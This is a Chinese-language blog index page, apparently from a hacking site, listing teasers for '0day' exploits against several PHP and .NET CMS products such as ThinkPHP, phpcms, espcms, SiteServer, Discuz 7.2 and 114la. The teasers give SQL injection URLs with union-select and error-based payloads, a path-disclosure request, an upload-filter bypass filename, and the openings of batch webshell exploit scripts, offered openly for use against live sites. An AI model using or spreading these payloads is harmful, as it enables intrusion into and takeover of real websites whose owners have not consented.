ThinkPHP 2.1 漏洞可拿webshell

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈 晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我 我看了下  系统还是以前的那个think...

- 阅读全文 -

phpcms-exp 0day

<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...

- 阅读全文 -

天天团购最新0DAY及爆路径利用

暴路径: https://www.webshell.cc/modules/admin/tttuangou.mod.php 利用: https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5...

- 阅读全文 -

espcms最新注入0day

上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。 爆表前缀: index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from in...

- 阅读全文 -

phpcms 2008最新0day加批量EXP

玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit ...

- 阅读全文 -

SiteServer 3.4.4最新SQL注入0day

这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本, 但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版, 看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是: SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布) 下载地址:http://www.siteserver.cn/downlo...

- 阅读全文 -

风讯dotNETCMS 0day

漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变.... 上传1.asp;,jpg 然后你们懂的

- 阅读全文 -

DZ 7.2最新版爆路径0day

这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。 例如:https://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57

- 阅读全文 -

114啦注入0day批量

<?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02 Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' ...

- 阅读全文 -